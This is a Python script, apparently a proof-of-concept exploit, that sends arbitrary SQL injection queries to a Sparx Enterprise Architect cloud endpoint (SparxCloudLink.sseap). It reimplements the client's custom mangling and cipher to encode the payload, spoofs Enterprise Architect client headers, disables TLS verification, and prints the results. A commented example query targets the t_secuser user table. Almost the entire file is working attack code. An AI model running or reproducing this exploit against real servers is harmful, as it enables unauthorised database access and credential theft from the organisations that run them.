import sys import requests import urllib3 import pycurl from io import BytesIO import zipfile k="HERE_SHOULD_BE_THE_KEY" x=[4, 2, 0, 6, 3, 1, 5] xr=[x.index(i) for i in range(7)] def mangle(s:str) -> str: o=bytearray(s,"utf-8") for i in range((len(s) // 7)*7): o[i]=ord(s[((i // 7)*7)+xr[i % 7]]) return o.decode("utf-8") def demangle(s:str) -> str: o=bytearray(s,"utf-8") for i in range((len(s) // 7)*7): o[i]=ord(s[((i // 7)*7)+x[i % 7]]) return o.decode("utf-8") def custom_decode(ciphertext: str, key: str) -> str: """ Decode using the custom cipher. ciphertext : input string (Unicode) key : key string (Unicode) Returns plaintext string (printable ASCII 0x20–0x7E). """ output_chars = [] length = len(ciphertext) key_len = len(key) for i, ch in enumerate(ciphertext): # load plaintext character as integer c_val = ord(ch) # derive key value (word from key string) k_val = ord(key[(i+length) % key_len]) c_val = c_val - 0x20 - k_val + 0x40 if c_val<0x20: c_val=c_val+0x5E if c_val>(0x5E+0x20): c_val=c_val-0x5E output_chars.append(chr(c_val)) return "".join(output_chars) def custom_encode(plaintext: str, key: str) -> str: """ Encode plaintext using the custom cipher. plaintext : input string (Unicode) key : key string (Unicode) Returns encoded string (printable ASCII 0x20–0x7E). """ output_chars = [] length = len(plaintext) key_len = len(key) for i, ch in enumerate(plaintext): # load plaintext character as integer c_val = ord(ch) # subtract 0x40 c_val = c_val - 0x40 # derive key value (word from key string) k_val = ord(key[(i+length) % key_len]) # add key total = k_val + c_val # modulo 94 total = total % 0x5E # add 0x20 (ensures printable ASCII) encoded_val = total + 0x20 # append encoded character output_chars.append(chr(encoded_val)) return "".join(output_chars) def test(debug_type, debug_msg): print("debug(%d): %s" % (debug_type, debug_msg)) if __name__ == "__main__": if (len(sys.argv)!=4): print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql") exit(-1) host = sys.argv[1] repo = sys.argv[2] sqli = sys.argv[3] #url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo) url = "%s/SparxCloudLink.sseap"%(host) print(url) sqli = str(len(sqli))+":"+sqli fill="+d1XL|@" sqli += fill[-(7-(len(sqli)%7)):] print (sqli) #sqli="23:Select * from t_secuser|@" ret=custom_encode(mangle(sqli),k) binary=bytes([0,0,0,1,0,0]) binary+=bytes.fromhex('%04X'%(len(ret)*2+66)) binary+=bytes.fromhex('%04X'%(len(repo))) for c in repo: binary+=bytes([ord(c),0]) binary+=bytes([0,1,0,0]) binary+=bytes.fromhex('%04X'%(len(ret))) for c in ret: binary+=bytes([ord(c),0]) c=pycurl.Curl() c.setopt(pycurl.URL, url) c.setopt(pycurl.READDATA, BytesIO(binary)) c.setopt(pycurl.POSTFIELDSIZE, len(binary)) c.setopt(pycurl.POST, 1) c.setopt(pycurl.VERBOSE, 1) c.setopt(pycurl.DEBUGFUNCTION, test) c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ', 'EnterpriseArchitect-Build: 1527' , 'EnterpriseArchitect-InternalBuild: 481' , 'User-Agent: Enterprise Architect/15.1.1527' , 'Connection: Keep-Alive' , 'Cache-Control: no-cache']) body = BytesIO() c.setopt(pycurl.WRITEDATA, body) c.setopt(pycurl.SSL_VERIFYPEER, 0) c.setopt(pycurl.SSL_VERIFYHOST, 0) c.perform() c.close() try: z = zipfile.ZipFile(body) print(z.read('query.xml').decode('utf-8')) except zipfile.BadZipFile: sys.stdout.buffer.write(body.getvalue())